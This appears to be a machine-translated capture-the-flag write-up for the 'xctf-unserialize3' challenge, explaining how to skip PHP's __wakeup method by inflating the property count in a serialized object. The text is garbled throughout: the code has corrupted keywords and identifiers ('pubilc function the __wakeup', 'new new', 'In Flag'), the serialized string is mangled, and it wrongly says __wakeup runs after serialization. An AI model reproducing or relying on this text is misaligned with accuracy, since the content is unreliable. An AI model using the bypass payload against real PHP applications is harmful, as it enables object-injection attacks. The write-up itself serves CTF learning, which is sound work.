__wakeup (): it will be called immediately after serialization.
Vulnerability Principle:
When deserializing strings, a large number of attribute value indicating its true value, then skip the __wakeup () execution.
Reference Title: xctf-unserialize3
For this problem, first class xctf can see there are flag variables, and calls __wakeup (), then consider the example of xctf class and variable serialized. And guess the intention to enter a sequence of results in? Carried POST request after code =.
<? PHP class XCTF { public $ In Flag = '111' ; pubilc function the __wakeup () { Exit ( 'Bad Requests' ); } } $ A = new new XCTF (); echo ( the serialize ( $ A )); ?> / / serialized output is: // O:. 4: "XCTF":. 1: {S:. 4: "In Flag"; S:. 3: "111";}
Normal result input, performs __wakeup (), so that the output 'bad requests', and exit the script, so the use of loopholes to bypass __wakeup ().
The numbers represent the number of sequences in the string to a variable number greater than the true value, and the POST request, get the result.
got the answer.